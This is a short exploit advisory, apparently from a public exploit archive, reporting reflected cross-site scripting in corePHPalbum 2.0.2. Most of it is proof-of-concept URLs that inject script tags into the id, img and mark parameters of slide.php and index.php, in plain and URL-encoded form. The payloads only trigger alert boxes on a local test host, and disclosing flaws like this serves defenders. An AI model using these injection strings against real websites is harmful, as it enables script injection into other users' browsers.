Kod:
# exploit title: xss in corePHPalbum 2.0.2
# date: 3.o3.2o11
# author: lemlajt
# software : corephpalbum @ sourceforge.net
# version: 2.0.2
# tested on: linux
# cve : 
#

 
PoC : 
http://localhost/www/cmsadmins/corep/cpa-2.0.2/slide.php?id="><script>alert(3)</script>&img="><script>alert(2)</script>&mark="><script>alert(1)</script>

http://localhost/www/cmsadmins/corep/cpa-2.0.2/index.php?id=%22%3E%3Cscript%3Ealert%2812%29%3C/script%3E&mark=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E



# regards,
# lemlajt
# *